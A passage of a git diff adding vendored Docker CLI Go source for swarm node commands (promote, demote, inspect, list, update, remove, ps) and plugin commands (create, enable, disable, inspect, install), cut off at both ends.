newPsCommand(dockerCli), + newUpdateCommand(dockerCli), + ) + return cmd +} + +// Reference returns the reference of a node. The special value "self" for a node +// reference is mapped to the current node, hence the node ID is retrieved using +// the `/info` endpoint. 
+func Reference(ctx context.Context, client apiclient.APIClient, ref string) (string, error) { + if ref == "self" { + info, err := client.Info(ctx) + if err != nil { + return "", err + } + return info.Swarm.NodeID, nil + } + return ref, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/node/demote.go b/vendor/github.com/docker/docker/cli/command/node/demote.go new file mode 100644 index 0000000000..33f86c6499 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/demote.go @@ -0,0 +1,36 @@ +package node + +import ( + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +func newDemoteCommand(dockerCli *command.DockerCli) *cobra.Command { + return &cobra.Command{ + Use: "demote NODE [NODE...]", + Short: "Demote one or more nodes from manager in the swarm", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runDemote(dockerCli, args) + }, + } +} + +func runDemote(dockerCli *command.DockerCli, nodes []string) error { + demote := func(node *swarm.Node) error { + if node.Spec.Role == swarm.NodeRoleWorker { + fmt.Fprintf(dockerCli.Out(), "Node %s is already a worker.\n", node.ID) + return errNoRoleChange + } + node.Spec.Role = swarm.NodeRoleWorker + return nil + } + success := func(nodeID string) { + fmt.Fprintf(dockerCli.Out(), "Manager %s demoted in the swarm.\n", nodeID) + } + return updateNodes(dockerCli, nodes, demote, success) +} diff --git a/vendor/github.com/docker/docker/cli/command/node/inspect.go b/vendor/github.com/docker/docker/cli/command/node/inspect.go new file mode 100644 index 0000000000..fde70185f8 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/inspect.go @@ -0,0 +1,144 @@ +package node + +import ( + "fmt" + "io" + "sort" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + 
"github.com/docker/docker/cli/command/inspect" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/go-units" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type inspectOptions struct { + nodeIds []string + format string + pretty bool +} + +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] self|NODE [NODE...]", + Short: "Display detailed information on one or more nodes", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.nodeIds = args + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.") + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + getRef := func(ref string) (interface{}, []byte, error) { + nodeRef, err := Reference(ctx, client, ref) + if err != nil { + return nil, nil, err + } + node, _, err := client.NodeInspectWithRaw(ctx, nodeRef) + return node, nil, err + } + + if !opts.pretty { + return inspect.Inspect(dockerCli.Out(), opts.nodeIds, opts.format, getRef) + } + return printHumanFriendly(dockerCli.Out(), opts.nodeIds, getRef) +} + +func printHumanFriendly(out io.Writer, refs []string, getRef inspect.GetRefFunc) error { + for idx, ref := range refs { + obj, _, err := getRef(ref) + if err != nil { + return err + } + printNode(out, obj.(swarm.Node)) + + // TODO: better way to do this? 
+ // print extra space between objects, but not after the last one + if idx+1 != len(refs) { + fmt.Fprintf(out, "\n\n") + } else { + fmt.Fprintf(out, "\n") + } + } + return nil +} + +// TODO: use a template +func printNode(out io.Writer, node swarm.Node) { + fmt.Fprintf(out, "ID:\t\t\t%s\n", node.ID) + ioutils.FprintfIfNotEmpty(out, "Name:\t\t\t%s\n", node.Spec.Name) + if node.Spec.Labels != nil { + fmt.Fprintln(out, "Labels:") + for k, v := range node.Spec.Labels { + fmt.Fprintf(out, " - %s = %s\n", k, v) + } + } + + ioutils.FprintfIfNotEmpty(out, "Hostname:\t\t%s\n", node.Description.Hostname) + fmt.Fprintf(out, "Joined at:\t\t%s\n", command.PrettyPrint(node.CreatedAt)) + fmt.Fprintln(out, "Status:") + fmt.Fprintf(out, " State:\t\t\t%s\n", command.PrettyPrint(node.Status.State)) + ioutils.FprintfIfNotEmpty(out, " Message:\t\t%s\n", command.PrettyPrint(node.Status.Message)) + fmt.Fprintf(out, " Availability:\t\t%s\n", command.PrettyPrint(node.Spec.Availability)) + ioutils.FprintfIfNotEmpty(out, " Address:\t\t%s\n", command.PrettyPrint(node.Status.Addr)) + + if node.ManagerStatus != nil { + fmt.Fprintln(out, "Manager Status:") + fmt.Fprintf(out, " Address:\t\t%s\n", node.ManagerStatus.Addr) + fmt.Fprintf(out, " Raft Status:\t\t%s\n", command.PrettyPrint(node.ManagerStatus.Reachability)) + leader := "No" + if node.ManagerStatus.Leader { + leader = "Yes" + } + fmt.Fprintf(out, " Leader:\t\t%s\n", leader) + } + + fmt.Fprintln(out, "Platform:") + fmt.Fprintf(out, " Operating System:\t%s\n", node.Description.Platform.OS) + fmt.Fprintf(out, " Architecture:\t\t%s\n", node.Description.Platform.Architecture) + + fmt.Fprintln(out, "Resources:") + fmt.Fprintf(out, " CPUs:\t\t\t%d\n", node.Description.Resources.NanoCPUs/1e9) + fmt.Fprintf(out, " Memory:\t\t%s\n", units.BytesSize(float64(node.Description.Resources.MemoryBytes))) + + var pluginTypes []string + pluginNamesByType := map[string][]string{} + for _, p := range node.Description.Engine.Plugins { + // append to 
pluginTypes only if not done previously + if _, ok := pluginNamesByType[p.Type]; !ok { + pluginTypes = append(pluginTypes, p.Type) + } + pluginNamesByType[p.Type] = append(pluginNamesByType[p.Type], p.Name) + } + + if len(pluginTypes) > 0 { + fmt.Fprintln(out, "Plugins:") + sort.Strings(pluginTypes) // ensure stable output + for _, pluginType := range pluginTypes { + fmt.Fprintf(out, " %s:\t\t%s\n", pluginType, strings.Join(pluginNamesByType[pluginType], ", ")) + } + } + fmt.Fprintf(out, "Engine Version:\t\t%s\n", node.Description.Engine.EngineVersion) + + if len(node.Description.Engine.Labels) != 0 { + fmt.Fprintln(out, "Engine Labels:") + for k, v := range node.Description.Engine.Labels { + fmt.Fprintf(out, " - %s = %s\n", k, v) + } + } +} diff --git a/vendor/github.com/docker/docker/cli/command/node/list.go b/vendor/github.com/docker/docker/cli/command/node/list.go new file mode 100644 index 0000000000..9cacdcf441 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/list.go @@ -0,0 +1,115 @@ +package node + +import ( + "fmt" + "io" + "text/tabwriter" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +const ( + listItemFmt = "%s\t%s\t%s\t%s\t%s\n" +) + +type listOptions struct { + quiet bool + filter opts.FilterOpt +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Aliases: []string{"list"}, + Short: "List nodes in the swarm", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") 
+ + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + client := dockerCli.Client() + out := dockerCli.Out() + ctx := context.Background() + + nodes, err := client.NodeList( + ctx, + types.NodeListOptions{Filters: opts.filter.Value()}) + if err != nil { + return err + } + + if len(nodes) > 0 && !opts.quiet { + // only non-empty nodes and not quiet, should we call /info api + info, err := client.Info(ctx) + if err != nil { + return err + } + printTable(out, nodes, info) + } else if !opts.quiet { + // no nodes and not quiet, print only one line with columns ID, HOSTNAME, ... + printTable(out, nodes, types.Info{}) + } else { + printQuiet(out, nodes) + } + + return nil +} + +func printTable(out io.Writer, nodes []swarm.Node, info types.Info) { + writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) + + // Ignore flushing errors + defer writer.Flush() + + fmt.Fprintf(writer, listItemFmt, "ID", "HOSTNAME", "STATUS", "AVAILABILITY", "MANAGER STATUS") + for _, node := range nodes { + name := node.Description.Hostname + availability := string(node.Spec.Availability) + + reachability := "" + if node.ManagerStatus != nil { + if node.ManagerStatus.Leader { + reachability = "Leader" + } else { + reachability = string(node.ManagerStatus.Reachability) + } + } + + ID := node.ID + if node.ID == info.Swarm.NodeID { + ID = ID + " *" + } + + fmt.Fprintf( + writer, + listItemFmt, + ID, + name, + command.PrettyPrint(string(node.Status.State)), + command.PrettyPrint(availability), + command.PrettyPrint(reachability)) + } +} + +func printQuiet(out io.Writer, nodes []swarm.Node) { + for _, node := range nodes { + fmt.Fprintln(out, node.ID) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/node/opts.go b/vendor/github.com/docker/docker/cli/command/node/opts.go new file mode 100644 index 0000000000..7e6c55d487 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/opts.go @@ -0,0 +1,60 @@ +package node + +import ( + "fmt" + 
"strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" +) + +type nodeOptions struct { + annotations + role string + availability string +} + +type annotations struct { + name string + labels opts.ListOpts +} + +func newNodeOptions() *nodeOptions { + return &nodeOptions{ + annotations: annotations{ + labels: opts.NewListOpts(nil), + }, + } +} + +func (opts *nodeOptions) ToNodeSpec() (swarm.NodeSpec, error) { + var spec swarm.NodeSpec + + spec.Annotations.Name = opts.annotations.name + spec.Annotations.Labels = runconfigopts.ConvertKVStringsToMap(opts.annotations.labels.GetAll()) + + switch swarm.NodeRole(strings.ToLower(opts.role)) { + case swarm.NodeRoleWorker: + spec.Role = swarm.NodeRoleWorker + case swarm.NodeRoleManager: + spec.Role = swarm.NodeRoleManager + case "": + default: + return swarm.NodeSpec{}, fmt.Errorf("invalid role %q, only worker and manager are supported", opts.role) + } + + switch swarm.NodeAvailability(strings.ToLower(opts.availability)) { + case swarm.NodeAvailabilityActive: + spec.Availability = swarm.NodeAvailabilityActive + case swarm.NodeAvailabilityPause: + spec.Availability = swarm.NodeAvailabilityPause + case swarm.NodeAvailabilityDrain: + spec.Availability = swarm.NodeAvailabilityDrain + case "": + default: + return swarm.NodeSpec{}, fmt.Errorf("invalid availability %q, only active, pause and drain are supported", opts.availability) + } + + return spec, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/node/promote.go b/vendor/github.com/docker/docker/cli/command/node/promote.go new file mode 100644 index 0000000000..f47d783f4c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/promote.go @@ -0,0 +1,36 @@ +package node + +import ( + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +func 
newPromoteCommand(dockerCli *command.DockerCli) *cobra.Command { + return &cobra.Command{ + Use: "promote NODE [NODE...]", + Short: "Promote one or more nodes to manager in the swarm", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runPromote(dockerCli, args) + }, + } +} + +func runPromote(dockerCli *command.DockerCli, nodes []string) error { + promote := func(node *swarm.Node) error { + if node.Spec.Role == swarm.NodeRoleManager { + fmt.Fprintf(dockerCli.Out(), "Node %s is already a manager.\n", node.ID) + return errNoRoleChange + } + node.Spec.Role = swarm.NodeRoleManager + return nil + } + success := func(nodeID string) { + fmt.Fprintf(dockerCli.Out(), "Node %s promoted to a manager in the swarm.\n", nodeID) + } + return updateNodes(dockerCli, nodes, promote, success) +} diff --git a/vendor/github.com/docker/docker/cli/command/node/ps.go b/vendor/github.com/docker/docker/cli/command/node/ps.go new file mode 100644 index 0000000000..a034721d24 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/ps.go @@ -0,0 +1,93 @@ +package node + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/idresolver" + "github.com/docker/docker/cli/command/task" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type psOptions struct { + nodeIDs []string + noResolve bool + noTrunc bool + filter opts.FilterOpt +} + +func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := psOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ps [OPTIONS] [NODE...]", + Short: "List tasks running on one or more nodes, defaults to current node", + Args: cli.RequiresMinArgs(0), + RunE: func(cmd *cobra.Command, args []string) error { + opts.nodeIDs = []string{"self"} + + if len(args) 
!= 0 { + opts.nodeIDs = args + } + + return runPs(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") + flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runPs(dockerCli *command.DockerCli, opts psOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + var ( + errs []string + tasks []swarm.Task + ) + + for _, nodeID := range opts.nodeIDs { + nodeRef, err := Reference(ctx, client, nodeID) + if err != nil { + errs = append(errs, err.Error()) + continue + } + + node, _, err := client.NodeInspectWithRaw(ctx, nodeRef) + if err != nil { + errs = append(errs, err.Error()) + continue + } + + filter := opts.filter.Value() + filter.Add("node", node.ID) + + nodeTasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) + if err != nil { + errs = append(errs, err.Error()) + continue + } + + tasks = append(tasks, nodeTasks...) 
+ } + + if err := task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc); err != nil { + errs = append(errs, err.Error()) + } + + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/node/remove.go b/vendor/github.com/docker/docker/cli/command/node/remove.go new file mode 100644 index 0000000000..19b4a96631 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/remove.go @@ -0,0 +1,56 @@ +package node + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type removeOptions struct { + force bool +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := removeOptions{} + + cmd := &cobra.Command{ + Use: "rm [OPTIONS] NODE [NODE...]", + Aliases: []string{"remove"}, + Short: "Remove one or more nodes from the swarm", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runRemove(dockerCli, args, opts) + }, + } + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Force remove a node from the swarm") + return cmd +} + +func runRemove(dockerCli *command.DockerCli, args []string, opts removeOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + var errs []string + + for _, nodeID := range args { + err := client.NodeRemove(ctx, nodeID, types.NodeRemoveOptions{Force: opts.force}) + if err != nil { + errs = append(errs, err.Error()) + continue + } + fmt.Fprintf(dockerCli.Out(), "%s\n", nodeID) + } + + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/node/update.go b/vendor/github.com/docker/docker/cli/command/node/update.go new file mode 100644 index 
0000000000..65339e138b --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/update.go @@ -0,0 +1,121 @@ +package node + +import ( + "errors" + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" + "github.com/spf13/pflag" + "golang.org/x/net/context" +) + +var ( + errNoRoleChange = errors.New("role was already set to the requested value") +) + +func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { + nodeOpts := newNodeOptions() + + cmd := &cobra.Command{ + Use: "update [OPTIONS] NODE", + Short: "Update a node", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runUpdate(dockerCli, cmd.Flags(), args[0]) + }, + } + + flags := cmd.Flags() + flags.StringVar(&nodeOpts.role, flagRole, "", "Role of the node (worker/manager)") + flags.StringVar(&nodeOpts.availability, flagAvailability, "", "Availability of the node (active/pause/drain)") + flags.Var(&nodeOpts.annotations.labels, flagLabelAdd, "Add or update a node label (key=value)") + labelKeys := opts.NewListOpts(nil) + flags.Var(&labelKeys, flagLabelRemove, "Remove a node label if exists") + return cmd +} + +func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, nodeID string) error { + success := func(_ string) { + fmt.Fprintln(dockerCli.Out(), nodeID) + } + return updateNodes(dockerCli, []string{nodeID}, mergeNodeUpdate(flags), success) +} + +func updateNodes(dockerCli *command.DockerCli, nodes []string, mergeNode func(node *swarm.Node) error, success func(nodeID string)) error { + client := dockerCli.Client() + ctx := context.Background() + + for _, nodeID := range nodes { + node, _, err := client.NodeInspectWithRaw(ctx, nodeID) + if err != nil { + return err + } + + err = mergeNode(&node) + if err != nil { + if err == errNoRoleChange { + 
continue + } + return err + } + err = client.NodeUpdate(ctx, node.ID, node.Version, node.Spec) + if err != nil { + return err + } + success(nodeID) + } + return nil +} + +func mergeNodeUpdate(flags *pflag.FlagSet) func(*swarm.Node) error { + return func(node *swarm.Node) error { + spec := &node.Spec + + if flags.Changed(flagRole) { + str, err := flags.GetString(flagRole) + if err != nil { + return err + } + spec.Role = swarm.NodeRole(str) + } + if flags.Changed(flagAvailability) { + str, err := flags.GetString(flagAvailability) + if err != nil { + return err + } + spec.Availability = swarm.NodeAvailability(str) + } + if spec.Annotations.Labels == nil { + spec.Annotations.Labels = make(map[string]string) + } + if flags.Changed(flagLabelAdd) { + labels := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll() + for k, v := range runconfigopts.ConvertKVStringsToMap(labels) { + spec.Annotations.Labels[k] = v + } + } + if flags.Changed(flagLabelRemove) { + keys := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll() + for _, k := range keys { + // if a key doesn't exist, fail the command explicitly + if _, exists := spec.Annotations.Labels[k]; !exists { + return fmt.Errorf("key %s doesn't exist in node's labels", k) + } + delete(spec.Annotations.Labels, k) + } + } + return nil + } +} + +const ( + flagRole = "role" + flagAvailability = "availability" + flagLabelAdd = "label-add" + flagLabelRemove = "label-rm" +) diff --git a/vendor/github.com/docker/docker/cli/command/out.go b/vendor/github.com/docker/docker/cli/command/out.go new file mode 100644 index 0000000000..85718d7acd --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/out.go @@ -0,0 +1,69 @@ +package command + +import ( + "io" + "os" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/term" +) + +// OutStream is an output stream used by the DockerCli to write normal program +// output. 
+type OutStream struct { + out io.Writer + fd uintptr + isTerminal bool + state *term.State +} + +func (o *OutStream) Write(p []byte) (int, error) { + return o.out.Write(p) +} + +// FD returns the file descriptor number for this stream +func (o *OutStream) FD() uintptr { + return o.fd +} + +// IsTerminal returns true if this stream is connected to a terminal +func (o *OutStream) IsTerminal() bool { + return o.isTerminal +} + +// SetRawTerminal sets raw mode on the output terminal +func (o *OutStream) SetRawTerminal() (err error) { + if os.Getenv("NORAW") != "" || !o.isTerminal { + return nil + } + o.state, err = term.SetRawTerminalOutput(o.fd) + return err +} + +// RestoreTerminal restores normal mode to the terminal +func (o *OutStream) RestoreTerminal() { + if o.state != nil { + term.RestoreTerminal(o.fd, o.state) + } +} + +// GetTtySize returns the height and width in characters of the tty +func (o *OutStream) GetTtySize() (uint, uint) { + if !o.isTerminal { + return 0, 0 + } + ws, err := term.GetWinsize(o.fd) + if err != nil { + logrus.Debugf("Error getting size: %s", err) + if ws == nil { + return 0, 0 + } + } + return uint(ws.Height), uint(ws.Width) +} + +// NewOutStream returns a new OutStream object from a Writer +func NewOutStream(out io.Writer) *OutStream { + fd, isTerminal := term.GetFdInfo(out) + return &OutStream{out: out, fd: fd, isTerminal: isTerminal} +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/cmd.go b/vendor/github.com/docker/docker/cli/command/plugin/cmd.go new file mode 100644 index 0000000000..92c990a975 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/cmd.go @@ -0,0 +1,31 @@ +package plugin + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +// NewPluginCommand returns a cobra command for `plugin` subcommands +func NewPluginCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "plugin", + Short: 
"Manage plugins", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + + cmd.AddCommand( + newDisableCommand(dockerCli), + newEnableCommand(dockerCli), + newInspectCommand(dockerCli), + newInstallCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + newSetCommand(dockerCli), + newPushCommand(dockerCli), + newCreateCommand(dockerCli), + newUpgradeCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/create.go b/vendor/github.com/docker/docker/cli/command/plugin/create.go new file mode 100644 index 0000000000..2aab1e9e4a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/create.go @@ -0,0 +1,125 @@ +package plugin + +import ( + "encoding/json" + "fmt" + "io" + "os" + "path/filepath" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/reference" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +// validateTag checks if the given repoName can be resolved. +func validateTag(rawRepo string) error { + _, err := reference.ParseNamed(rawRepo) + + return err +} + +// validateConfig ensures that a valid config.json is available in the given path +func validateConfig(path string) error { + dt, err := os.Open(filepath.Join(path, "config.json")) + if err != nil { + return err + } + + m := types.PluginConfig{} + err = json.NewDecoder(dt).Decode(&m) + dt.Close() + + return err +} + +// validateContextDir validates the given dir and returns abs path on success. 
+func validateContextDir(contextDir string) (string, error) { + absContextDir, err := filepath.Abs(contextDir) + + stat, err := os.Lstat(absContextDir) + if err != nil { + return "", err + } + + if !stat.IsDir() { + return "", fmt.Errorf("context must be a directory") + } + + return absContextDir, nil +} + +type pluginCreateOptions struct { + repoName string + context string + compress bool +} + +func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + options := pluginCreateOptions{} + + cmd := &cobra.Command{ + Use: "create [OPTIONS] PLUGIN PLUGIN-DATA-DIR", + Short: "Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory.", + Args: cli.RequiresMinArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + options.repoName = args[0] + options.context = args[1] + return runCreate(dockerCli, options) + }, + } + + flags := cmd.Flags() + + flags.BoolVar(&options.compress, "compress", false, "Compress the context using gzip") + + return cmd +} + +func runCreate(dockerCli *command.DockerCli, options pluginCreateOptions) error { + var ( + createCtx io.ReadCloser + err error + ) + + if err := validateTag(options.repoName); err != nil { + return err + } + + absContextDir, err := validateContextDir(options.context) + if err != nil { + return err + } + + if err := validateConfig(options.context); err != nil { + return err + } + + compression := archive.Uncompressed + if options.compress { + logrus.Debugf("compression enabled") + compression = archive.Gzip + } + + createCtx, err = archive.TarWithOptions(absContextDir, &archive.TarOptions{ + Compression: compression, + }) + + if err != nil { + return err + } + + ctx := context.Background() + + createOptions := types.PluginCreateOptions{RepoName: options.repoName} + if err = dockerCli.Client().PluginCreate(ctx, createCtx, createOptions); err != nil { + return err + } + fmt.Fprintln(dockerCli.Out(), options.repoName) + return nil +} diff --git 
a/vendor/github.com/docker/docker/cli/command/plugin/disable.go b/vendor/github.com/docker/docker/cli/command/plugin/disable.go new file mode 100644 index 0000000000..07b0ec2288 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/disable.go @@ -0,0 +1,36 @@ +package plugin + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +func newDisableCommand(dockerCli *command.DockerCli) *cobra.Command { + var force bool + + cmd := &cobra.Command{ + Use: "disable [OPTIONS] PLUGIN", + Short: "Disable a plugin", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runDisable(dockerCli, args[0], force) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&force, "force", "f", false, "Force the disable of an active plugin") + return cmd +} + +func runDisable(dockerCli *command.DockerCli, name string, force bool) error { + if err := dockerCli.Client().PluginDisable(context.Background(), name, types.PluginDisableOptions{Force: force}); err != nil { + return err + } + fmt.Fprintln(dockerCli.Out(), name) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/enable.go b/vendor/github.com/docker/docker/cli/command/plugin/enable.go new file mode 100644 index 0000000000..77762f4024 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/enable.go @@ -0,0 +1,47 @@ +package plugin + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type enableOpts struct { + timeout int + name string +} + +func newEnableCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts enableOpts + + cmd := &cobra.Command{ + Use: "enable [OPTIONS] PLUGIN", + Short: "Enable a plugin", + Args: cli.ExactArgs(1), + RunE: func(cmd 
*cobra.Command, args []string) error { + opts.name = args[0] + return runEnable(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.IntVar(&opts.timeout, "timeout", 0, "HTTP client timeout (in seconds)") + return cmd +} + +func runEnable(dockerCli *command.DockerCli, opts *enableOpts) error { + name := opts.name + if opts.timeout < 0 { + return fmt.Errorf("negative timeout %d is invalid", opts.timeout) + } + + if err := dockerCli.Client().PluginEnable(context.Background(), name, types.PluginEnableOptions{Timeout: opts.timeout}); err != nil { + return err + } + fmt.Fprintln(dockerCli.Out(), name) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/inspect.go b/vendor/github.com/docker/docker/cli/command/plugin/inspect.go new file mode 100644 index 0000000000..c2c7a0d6bc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/inspect.go @@ -0,0 +1,42 @@ +package plugin + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type inspectOptions struct { + pluginNames []string + format string +} + +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] PLUGIN [PLUGIN...]", + Short: "Display detailed information on one or more plugins", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.pluginNames = args + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + getRef := func(ref string) (interface{}, []byte, error) { + return client.PluginInspectWithRaw(ctx, ref) + } + + return 
inspect.Inspect(dockerCli.Out(), opts.pluginNames, opts.format, getRef) +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/install.go b/vendor/github.com/docker/docker/cli/command/plugin/install.go new file mode 100644 index 0000000000..2c3170c54a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/install.go @@ -0,0 +1,208 @@ +package plugin + +import ( + "bufio" + "errors" + "fmt" + "strings" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/image" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" + "github.com/spf13/pflag" + "golang.org/x/net/context" +) + +type pluginOptions struct { + remote string + localName string + grantPerms bool + disable bool + args []string + skipRemoteCheck bool +} + +func loadPullFlags(opts *pluginOptions, flags *pflag.FlagSet) { + flags.BoolVar(&opts.grantPerms, "grant-all-permissions", false, "Grant all permissions necessary to run the plugin") + command.AddTrustedFlags(flags, true) +} + +func newInstallCommand(dockerCli *command.DockerCli) *cobra.Command { + var options pluginOptions + cmd := &cobra.Command{ + Use: "install [OPTIONS] PLUGIN [KEY=VALUE...]", + Short: "Install a plugin", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + options.remote = args[0] + if len(args) > 1 { + options.args = args[1:] + } + return runInstall(dockerCli, options) + }, + } + + flags := cmd.Flags() + loadPullFlags(&options, flags) + flags.BoolVar(&options.disable, "disable", false, "Do not enable the plugin on install") + flags.StringVar(&options.localName, "alias", "", "Local name for plugin") + return cmd +} + +func getRepoIndexFromUnnormalizedRef(ref 
